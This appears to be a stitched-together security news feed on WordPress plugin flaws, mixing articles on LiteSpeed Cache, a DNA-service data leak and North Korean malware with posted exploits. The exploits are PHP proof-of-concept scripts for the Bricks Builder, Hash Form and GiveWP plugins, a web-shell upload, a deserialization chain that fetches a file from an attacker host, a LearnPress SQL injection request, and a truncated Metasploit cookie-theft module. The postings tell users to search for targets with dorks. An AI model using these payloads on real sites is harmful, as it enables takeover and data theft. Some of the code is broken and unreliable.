The popular LiteSpeed Cache plug-in is vulnerable to unauthenticated privilege escalation via a dangerous XSS flaw.

Source: Primakov via Shutterstock

A WordPress plug-in installed more than 6 million times is vulnerable to a cross-site scripting flaw (XSS) that allows attackers to escalate privileges and potentially install malicious code to enable redirects, ads, and other HTML payloads onto an affected website.

A security researcher who goes by the online name "TaiYou" discovered the flaw, tracked as CVE-2024-47374, in LiteSpeed Cache, known as the most popular caching plug-in for the WordPress content management system (CMS). TaiYou reported the flaw on Sept. 24 to Patchstack via the Patchstack Bug Bounty Program for WordPress; it affects LiteSpeed Cache through version 6.5.0.2, and users should update immediately to avoid being vulnerable to attack.

LiteSpeed Cache is described by its developers as an "all-in-one site acceleration plugin, featuring an exclusive server-level cache and a collection of optimization features." It supports WordPress Multisite and is compatible with the most popular plug-ins, including WooCommerce, bbPress, and Yoast SEO.

The flaw that requires immediate attention is an unauthenticated stored XSS vulnerability that "could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request," according to Patchstack.

XSS is one of the most oft-exploited and oldest Web vulnerabilities, allowing an attacker to inject malicious code into a legitimate webpage or application to execute malicious scripts that affect the person visiting the site.

**Three WordPress Plug-in Flaws, One Dangerous**

TaiYou actually found three flaws in the plug-in, including another XSS flaw as well as a path-traversal vulnerability. However, only CVE-2024-47374 is considered dangerous and expected to be exploited by attackers, according to Patchstack.

Upon notification by Patchstack, the developers of LiteSpeed cache plug-in sent back a patch for validation on the same day. Patchstack published an update that fixes all three flaws in LiteSpeed cache version 6.5.1 on Sept. 25, and added the flaws to its vulnerability database five days later.

CVE-2024-47374 is characterized as creating "Improper Neutralization of Input During Web Page Generation," according to its listing on CVEdetails.com. "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users," according to the listing.

The vulnerability occurs because the code that handles the view of a queue in a particular piece of the plug-in doesn’t implement sanitization and output escaping, according to Patchstack.

"The plugin outputs a list of URLs that are queued for unique CSS generation and with the URL another functionality called 'Vary Group' is printed on the Admin page," according to the blog post.

In this output, the "Vary Group" functionality combines the concepts of "cache varies" and "user roles." "The vulnerability occurs because Vary Group can be supplied by a user via an HTTP Header and printed on the admin page without sanitization," according to Patchstack.

**Update & Mitigate CVE-2024-47374**

Due to its widespread use as a foundation for websites, the WordPress platform and its plug-ins especially are a notoriously popular target for threat actors, giving them easy access to a broad attack surface. Attackers particularly like to target singular plug-ins with large install bases, which makes vulnerable versions of LiteSpeed Cache a likely target.

The patch for CVE-2024-47374 is "fairly simple," sanitizing the output using esc\_html, according to Patchstack. The company issued a virtual patch to mitigate the flaw by blocking any attacks until its customers have updated to a fixed version. Meanwhile, all administrators of WordPress sites that use LiteSpeed Cache are advised to update to fixed version 6.5.1 immediately.

Patchstack also recommends that WordPress website developers working with the plug-in apply escaping and sanitization to any message that will be displayed as an admin notice to mitigate the vulnerability.

"Depending on the context of the data, we recommend using sanitize\_text\_field to sanitize value for HTML output (outside of HTML attribute) or esc\_html," according to the post. "For escaping values inside of attributes, you can use the esc\_attr function."

Patchstack also recommends that site developers working with LiteSpeed Cache also apply a proper permission or authorization check to the registered rest route endpoints to avoid exposing a site to XSS vulnerability.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Single HTTP Request Can Exploit 6M WordPress Sites

A new high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable malicious actors to execute arbitrary JavaScript code under certain conditions.
The flaw, tracked as CVE-2024-47374 (CVSS score: 7.2), has been described as a stored cross-site scripting (XSS) vulnerability impacting all versions of the plugin up to and including 6.5.0.2.
It was

Website Security / Vulnerability

A new high-severity security flaw has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable malicious actors to execute arbitrary JavaScript code under certain conditions.

The flaw, tracked as **CVE-2024-47374** (CVSS score: 7.2), has been described as a stored cross-site scripting (XSS) vulnerability impacting all versions of the plugin up to and including 6.5.0.2.

It was addressed in version 6.5.1 on September 25, 2024, following responsible disclosure by Patchstack Alliance researcher TaiYou.

"It could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request," Patchstack said in a report.

The flaw stems from the manner in which the plugin the "X-LSCACHE-VARY-VALUE" HTTP header value is parsed without adequate sanitization and output escaping, thereby allowing for injection of arbitrary web scripts.

That said, it's worth pointing out that the Page Optimization settings "CSS Combine" and "Generate UCSS" are required to enable the exploit to be successful.

Also called persistent XSS attacks, such vulnerabilities make it possible to store an injected script permanently on the target website's servers, such as in a database, in a message forum, in a visitor log, or in a comment.

This causes the malicious code embedded within the script to be executed every time an unsuspecting site visitor lands on the requested resource, for instance, the web page containing the specially crafted comment.

Stored XSS attacks can have serious consequences as they could be weaponized to deliver browser-based exploits, steal sensitive information, or even hijack an authenticated user's session and perform actions on their behalf.

The most damaging scenario is when the hijacked user account is that of a site administrator, thereby allowing a threat actor to completely take control of the website and stage even more powerful attacks.

WordPress plug-ins and themes are a popular avenue for cybercriminals looking to compromise legitimate websites. With LiteSpeed Cache boasting over six million active installations, flaws in the plugin pose a lucrative attack surface for opportunistic attacks.

The latest patch arrives nearly a month after the plugin developers addressed another flaw (CVE-2024-44000, CVSS score: 7.5) that could allow unauthenticated users to take control of arbitrary accounts.

It also follows the disclosure of an unpatched critical SQL injection flaw in the TI WooCommerce Wishlist plugin (CVE-2024-43917, CVSS score: 9.8) that, if successfully exploited, permits any user to execute arbitrary SQL queries in the database of the WordPress site.

Another critical security vulnerability concerns the Jupiter X Core WordPress plugin (CVE-2024-7772, CVSS score: 9.8) that allows unauthenticated attackers to upload arbitrary files on the affected site's server, potentially leading to remote code execution.

It has been fixed in version 4.7.8, along with a high-severity authentication bypass flaw (CVE-2024-7781, CVSS score: 8.1) that "makes it possible for unauthenticated attackers to log in as the first user to have logged in with a social media account, including administrator accounts," Wordfence said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

WordPress LiteSpeed Cache Plugin Security Flaw Exposes Sites to XSS Attacks

WordPress Bricks Builder Theme version 1.9.6 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : WordPress Bricks Builder Theme 1.9.6 php code injection Vulnerability                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://bricksbuilder.io/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 53 set your target.

[+] Line 45 set your commands.

[+] Line 68 set your path.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class MetasploitModule {

    private $info; // معلومات الوحدة  
    private $targetUri; // URI المستهدف

    // دالة لجلب الـ Nonce  
    private function fetchNonce() {  
        // تحقق مما إذا كانت targetUri مُعرفة  
        if (empty($this->targetUri['path'])) {  
            throw new Exception('Target URI path is not set.');  
        }

        // إرسال طلب GET لجلب الـ Nonce  
        $response = $this->sendRequest(['method' => 'GET', 'uri' => $this->targetUri['path']]);  
        // إذا كانت الاستجابة غير ناجحة، نرجع null  
        if ($response['code'] !== 200) return null;

        // استخدام التعبير النمطي لاستخراج الـ Nonce  
        preg_match('/"nonce":"([a-f0-9]+)"/', $response['body'], $matches);  
        return $matches ? $matches[1] : null; // إرجاع الـ Nonce أو null إذا لم يتم العثور عليه  
    }

    // دالة تنفيذ الاستغلال  
    public function exploit() {  
        // جلب الـ Nonce  
        $nonce = $this->fetchNonce();  
        if (!$nonce) {  
            throw new Exception('Failed to retrieve nonce. Exiting...'); // إذا فشل جلب الـ Nonce  
        }

        echo "Nonce retrieved: {$nonce}\n"; // طباعة الـ Nonce المستخرج

        // إعداد البيانات لإرسالها في الطلب  
        $data = [  
            'postId' => rand(1, 10000), // توليد معرف عشوائي  
            'nonce' => $nonce, // استخدام الـ Nonce المستخرج  
            'element' => [  
                'name' => 'code',  
                'settings' => [  
                    'executeCode' => 'true',  
                    'code' => "<?php payload ?>" // هنا يتم وضع الشيفرة التي سيتم تنفيذها  
                ]  
            ]  
        ];

        // إرسال الطلب POST لتنفيذ الاستغلال  
        $this->sendRequest([  
            'method' => 'POST',  
            'uri' => $this->targetUri['path'] . '/index.php', // URL المستهدف  
            'ctype' => 'application/json', // نوع المحتوى  
            'data' => json_encode($data), // تحويل البيانات إلى صيغة JSON  
            'vars_get' => ['rest_route' => '/bricks/v1/render_element'] // المعلمات الإضافية  
        ]);  
    }

    // دالة لمحاكاة الطلبات HTTP  
    private function sendRequest($options) {  
        // قم بتنفيذ منطق الطلب HTTP هنا  
        return ['code' => 200, 'body' => '{"nonce":"123456"}']; // استجابة مثال، يجب استبدالها بالمنطق الفعلي  
    }  
}

// الاستخدام  
$targetUri = ['path' => '/path/to/target']; // تعيين مسار الهدف هنا  
$module = new MetasploitModule([], $targetUri); // تمرير targetUri عند إنشاء الكائن  
try {  
    $module->exploit(); // محاولة تنفيذ الاستغلال  
} catch (Exception $e) {  
    echo $e->getMessage(); // طباعة رسالة الخطأ إذا حدثت  
}

?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

WordPress Bricks Builder Theme 1.9.6 Code Injection

WordPress Hash Form plugin version 1.1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : WordPress Hash Form 1.1.0 php code injection Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://plugintests.com/plugins/wporg/hash-form/latest                                                                      |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 117 set your target.

[+] Line 111 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class WordPressHashFormRCE {  
    private $target_url;  
    private $nonce;

    public function __construct($target_url) {  
        $this->target_url = $target_url;  
    }

    public function check() {  
        if (!$this->isWordPressOnline()) {  
            return 'WordPress does not appear to be online.';  
        }

        $plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');

        if ($plugin_version === null) {  
            return 'Hash Form plugin does not appear to be installed.';  
        }

        if ($plugin_version === false) {  
            return 'Hash Form plugin is installed but the version is unknown.';  
        }

        if ($plugin_version !== '1.1.0') {  
            return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";  
        }

        return "Detected Hash Form plugin version: $plugin_version";  
    }

    public function exploit() {  
        echo "Attempting to retrieve nonce from the target...\n";  
        $this->nonce = $this->getNonce();

        if (!$this->nonce) {  
            die('Failed to retrieve the nonce necessary for file upload.');  
        }

        echo "Nonce retrieved: {$this->nonce}\n";  
        echo "Uploading PHP payload using the retrieved nonce...\n";

        $file_url = $this->uploadPhpFile();  
        if (!$file_url) {  
            die('Failed to upload the PHP payload. Check file permissions and server settings.');  
        }

        echo "PHP payload uploaded successfully to $file_url\n";  
        $this->triggerPayload($file_url);  
    }

    private function isWordPressOnline() {  
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
        return $response !== false;  
    }

    private function checkPluginVersion($plugin_name, $version) {  
        $response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");  
        if ($response === false) return null;

        preg_match('/"version":"([^"]+)"/', $response, $matches);  
        return $matches[1] ?? false;  // return the version or false if not found  
    }

    private function getNonce() {  
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
        if ($response === false) return null;

        preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);  
        return $matches[1] ?? null;  
    }

    private function uploadPhpFile() {  
        $file_content = $this->createPayload();  
        $file_name = strtolower(bin2hex(random_bytes(4))) . '.php';

        $response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [  
            'action' => 'hashform_file_upload_action',  
            'file_uploader_nonce' => $this->nonce,  
            'allowedExtensions[0]' => 'php',  
            'sizeLimit' => 1048576,  
            'qqfile' => $file_name,  
            'data' => $file_content  
        ]);

        $json_response = json_decode($response, true);  
        return $json_response['url'] ?? null;  
    }

    private function triggerPayload($url) {  
        echo "Triggering the payload...\n";  
        $this->sendRequest('GET', $url);  
    }

    private function sendRequest($method, $uri, $data = []) {  
        $url = $this->target_url . $uri;  
        $options = [  
            'http' => [  
                'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
                'method' => $method,  
                'content' => http_build_query($data),  
            ],  
        ];  
        $context = stream_context_create($options);  
        return @file_get_contents($url, false, $context);  
    }

    private function createPayload() {  
        // You can define your payload logic here, for now, we return a simple payload  
        $payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";  
        return base64_encode($payload);  
    }  
}

// استخدام الوحدة  
$target_url = 'http://target-wordpress-site.com';  
$exploit = new WordPressHashFormRCE($target_url);

// تحقق من الثغرة  
echo $exploit->check() . "\n";

// تنفيذ الاستغلال  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

WordPress Hash Form 1.1.0 Code Injection

WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://givewp.com/                                                                                                         |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 78 set your file link.[+] Line 127. set your target.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass GiveWPExploit {    private $targetUrl;    private $headers;    public function __construct($targetUrl) {        $this->targetUrl = $targetUrl;        $this->headers = array(            'Content-Type: application/x-www-form-urlencoded'        );    }    public function check() {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));        if (!$response || $response['http_code'] != 200) {            echo "Failed to retrieve form list.\n";            return false;        }        $forms = json_decode($response['body'], true);        if (empty($forms)) {            echo "No forms found.\n";            return false;        }        echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";        return $forms;    }    public function exploit() {        $forms = $this->check();        if (!$forms) {            return;        }        $selectedForm = $forms[array_rand($forms)];        $validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);        if (!$validForm) {            echo "Failed to retrieve a valid form for exploitation.\n";            return;        }        echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";        $this->sendExploitRequest($validForm);    }    private function retrieveAndAnalyzeForm($formId) {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(            'action' => 'give_donation_form_nonce',            'give_form_id' => $formId        ));        if (!$response || $response['http_code'] != 200) {            return false;        }        $formData = json_decode($response['body'], true);        $giveFormId = $formId;        $giveFormHash = $formData['data'];        $givePriceId = '0'; // Default price ID        $giveAmount = '$10.00'; // Default amount        if (!$giveFormHash) {            return false;        }        return array(            'give_form_id' => $giveFormId,            'give_form_hash' => $giveFormHash,            'give_price_id' => $givePriceId,            'give_amount' => $giveAmount        );    }    private function sendExploitRequest($validForm) {        // URL of the malicious file to be fetched        $remoteFileUrl = 'http://attacker-server.com/malicious-file.php';        // Payload that uses file_get_contents to fetch the remote file        $payload = sprintf(            'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',            strlen($remoteFileUrl),            $remoteFileUrl        );        $data = array(            'give-form-id' => $validForm['give_form_id'],            'give-form-hash' => $validForm['give_form_hash'],            'give-price-id' => $validForm['give_price_id'],            'give-amount' => $validForm['give_amount'],            'give_first' => 'Test',            'give_last' => 'User',            'give_email' => 'test@example.com',            'give_title' => $payload,            'give-gateway' => 'offline',            'action' => 'give_process_donation'        );        $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);    }    private function sendRequest($method, $url, $data) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers),                'content' => http_build_query($data)            )        );        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === false) {            return false;        }        return array(            'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code            'body' => $result        );    }}// Usage$exploit = new GiveWPExploit('http://127.0.0.1');$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress…

ChiceDNA exposed 8,000 sensitive records, including biometric images, personal details, and facial DNA data in an unsecured WordPress folder. Privacy concerns highlight the need for stronger data protection.

An Indiana-based genetic DNA testing and facial matching service provider exposed thousands of customers’ personal, biometric, and PII data. This incident was reported to Hackread.com by cybersecurity researcher Jeremiah Fowler, known for identifying and reporting misconfigured databases to companies before malicious actors exploit them.

The problematic aspect of this incident is that there was no misconfigured database or a compromised cloud server this time. It was just an unsecure WordPress folder hosting a treasure trove of sensitive data left for public access without any password or security authentication.

The exposed data comprised around 8,000 documents. It included biometric images, names, phone numbers, email addresses, racial or ethnic identities, and personal notes detailing reasons for seeking facial DNA analysis. The exposed information also includes records of vulnerable individuals, including newborn children.

These records were stored in a non-secure WordPress folder titled “Facial Recognition Uploads,” accessible to anyone with a web browser. The exposure lasted for an unknown duration, raising concerns about the potential misuse of this sensitive information.

In his report for vpnMentor shared with Hackread.com ahead of publishing, Fowler explained that Biometric data, such as facial recognition information, is highly sensitive and can be used to identify individuals, track their movements, and even manipulate their identities through deepfakes. Collecting, storing, and analyzing such data without explicit consent is a serious violation of individual privacy.

Metadata, the information that describes, organizes, and manages data, can also pose significant risks. In this case, the exposed metadata included personally identifiable information (PII) such as names, emails, and phone numbers. This information could be exploited for phishing, social engineering, or blackmail attempts.

For your information, ChoiceDNA is an Indiana-based company that offers DNA testing and facial recognition service called FACE IT DNA It uses facial comparison technology to analyze images to determine the likelihood of a genetic link between family members. The BASIC package is $38, while the PRO package is $63. 

Fowler sent the company a responsible disclosure notice after which the database was promptly secured. Still, such incidents show the importance of secure data storage practices. WordPress, while a popular content management system, can be vulnerable if not configured correctly. The exposed data in this case was stored in a non-secure WordPress folder, highlighting the need for robust security measures to protect sensitive information.

Companies and users/customers with known data exposure should immediately change passwords and avoid reusing the same passwords for multiple accounts. Create strong, unique passwords for each account and enable two-factor authentication (2FA) as an additional layer of security.

Be cautious when exposing emails and phone numbers, as potential phishing attempts or suspicious requests for additional information can occur. Verify requests for sensitive information, such as banking or credit card information, to ensure the person on the other end and the request are legitimate.

1.  Data of 7 Million 23andMe Users from DNA Service Hacked
2.  Researchers Encode Physical DNA with Malware to Infect PC
3.  DNA testing website MyHeritage hacked; 92M user accounts stolen

Facial DNA provider leaks biometric data via WordPress folder

WordPress LMS plugin versions 4.2.7 and below suffer from a remote SQL injection vulnerability.

    # CVE-2024-8522LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'## Stack```txtclass-lp-db.php:702, LP_Database->execute()class-lp-course-db.php:564, LP_Course_DB->get_courses()Courses.php:241, LearnPress\Models\Courses::get_courses()class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()class-wp-rest-server.php:1063, WP_REST_Server->dispatch()class-wp-rest-server.php:439, WP_REST_Server->serve_request()rest-api.php:420, rest_api_loaded()class-wp-hook.php:324, WP_Hook->apply_filters()class-wp-hook.php:348, WP_Hook->do_action()plugin.php:565, do_action_ref_array()class-wp.php:418, WP->parse_request()class-wp.php:813, WP->main()functions.php:1336, wp()wp-blog-header.php:16, require()index.php:17, {main}()```## <>```txtSELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10```## PoC```httpGET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1Host: localhost:8077User-Agent: curl/7.81.0Cookie: XDEBUG_SESSION=PHPSTORMAccept: */*```

WordPress LMS 4.2.7 SQL Injection

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.
The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is

Cyber Espionage / Malware

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.

The activity cluster is being tracked by Google-owned Mandiant under the moniker **UNC2970**, which it said overlaps with a threat group known as TEMP.Hermit, which is also broadly called Lazarus Group or Diamond Sleet (formerly Zinc).

The threat actor has a history of targeting government, defense, telecommunications, and financial institutions worldwide since at least 2013 to collect strategic intelligence that furthers North Korean interests. It's affiliated with the Reconnaissance General Bureau (RGB).

The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.

"UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies," it said in a new analysis, adding it copies and modifies job descriptions according to their target profiles.

"Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees."

The attack chains, also known as Operation Dream Job, entail the use of spear-phishing lures to engage with victims over email and WhatsApp in an attempt to build trust, before sending across a malicious ZIP archive file that's dressed up as a job description.

In an interesting twist, the PDF file of the description can only be opened with a trojanized version of a legitimate PDF reader application called Sumatra PDF included within the archive to deliver MISTPEN by means of a launcher referred to as BURNBOOK.

It's worth noting that this does not imply a supply chain attack nor is there a vulnerability in the software. Rather the attack has been found to employ an older Sumatra PDF version that has been repurposed to activate the infection chain.

This is a tried-and-tested method adopted by the hacking group as far back as 2022, with both Mandiant and Microsoft highlighting the use of a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks.

It's believed that the threat actors likely instruct the victims to open the PDF file using the enclosed weaponized PDF viewer program to trigger the execution of a malicious DLL file, a C/C++ launcher called BURNBOOK.

"This file is a dropper for an embedded DLL, 'wtsapi32.dll,' which is tracked as TEARPAGE and used to execute the MISTPEN backdoor after the system is rebooted," Mandiant researchers said. "MISTPEN is a trojanized version of a legitimate Notepad++ plugin, binhex.dll, which contains a backdoor."

TEARPAGE, a loader embedded within BURNBOOK, is responsible for decrypting and launching MISTPEN. A lightweight implant written in C, MISTPEN is equipped to download and execute Portable Executable (PE) files retrieved from a command-and-control (C2) server. It communicates over HTTP with the following Microsoft Graph URLs.

Mandiant also said it uncovered older BURNBOOK and MISTPEN artifacts, suggesting that they are being iteratively improved to add more capabilities and allow them to fly under the radar. The early MISTPEN samples have also been discovered using compromised WordPress websites as C2 domains.

"The threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware

This Metasploit module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a WordPress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class DebugLogError < StandardError; end  class WordPressNotOnline < StandardError; end  class AdminCookieError < StandardError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',        'Description' => %q{          This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin          that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when          the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint          which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.          The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.        },        'Author' => [          'Rafie Muhammad', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],          [ 'CVE', '2024-44000']        ],        'License' => MSF_LICENSE,        'Privileged' => false,        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix In-Memory',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows In-Memory',            {              'Platform' => 'win',              'Arch' => ARCH_CMD            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-09-04',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )  end  def check    @admin_cookie = get_valid_admin_cookie    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')  rescue WordPressNotOnline => e    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")  rescue DebugLogError => e    return CheckCode::Safe("#{e.class}, #{e}")  rescue AdminCookieError => e    return CheckCode::Safe("#{e.class}, #{e}")  end  def extract_cookies(debug_log)    admin_cookies = []    debug_log.each_line do |log_line|      # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c      match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)      admin_cookies << match.captures.compact.join('; ') if match    end    admin_cookies  end  def verify_admin_cookie(admin_cookies)    admin_cookies.each do |admin_cookie|      res = send_request_cgi({        'uri' => '/wp-admin/',        'cookie' => admin_cookie      })      return admin_cookie if res&.code == 200    end    nil  end  def get_valid_admin_cookie    raise WordPressNotOnline unless wordpress_and_online?    res = send_request_cgi({      'uri' => normalize_uri('wp-content', 'debug.log'),      'method' => 'GET'    })    raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200    raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')    admin_cookies = extract_cookies(res.body)    raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?    print_status('One or more potential admin cookies were found')    admin_cookie = verify_admin_cookie(admin_cookies)    raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie    admin_cookie  end  def exploit    unless @admin_cookie      begin        @admin_cookie = get_valid_admin_cookie        print_good('Found and tested valid admin cookie, we can upload and execute a payload')      rescue WordPressNotOnline => e        fail_with(Failure::NotFound, "#{e.class}, #{e}")      rescue DebugLogError, AdminCookieError => e        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")      end    end    print_status('Preparing payload...')    plugin_name = Rex::Text.rand_text_alpha(10)    payload_name = Rex::Text.rand_text_alpha(10).to_s    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")    zip = generate_plugin(plugin_name, payload_name)    print_status('Uploading payload...')    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded    print_status("Executing the payload at #{payload_uri}...")    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")   